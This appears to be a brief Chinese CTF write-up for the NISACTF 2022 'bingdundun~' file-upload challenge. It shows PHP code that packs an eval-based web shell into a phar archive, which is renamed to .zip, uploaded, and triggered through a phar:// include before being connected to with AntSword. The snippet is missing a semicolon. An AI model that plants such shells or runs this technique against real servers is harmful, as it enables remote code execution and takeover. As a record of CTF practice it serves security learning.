[NISACTF 2022]bingdundun~

发表于2023-07-06 | 更新于 2023-07-06 | 文件上传漏洞

| 字数总计: 444 | 阅读时长: 1分钟 | 阅读量: 241

这篇文章距离最后更新已过442 天,如果文章内容或图片资源失效，请留言反馈，我会及时处理，谢谢！

phar伪协议解析文件
上传一个带有木马的.phar文件，改.zip上传

<?php
    $payload = '<?php eval($_POST["shell"]); ?>' 
    $phar = new Phar("webshell.phar"); 
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>"); 
    $phar->addFromString("webshell.php", "$payload"); 
    $phar->stopBuffering();
?>

file=phar://xxxxxxxxx.zip/webshell
因为题目会自动在后面加.php所以不用写。
然后用蚁剑连。

作者: CHHHCHHOH

文章链接: http://124.221.19.214/archives/173/

无标签

评论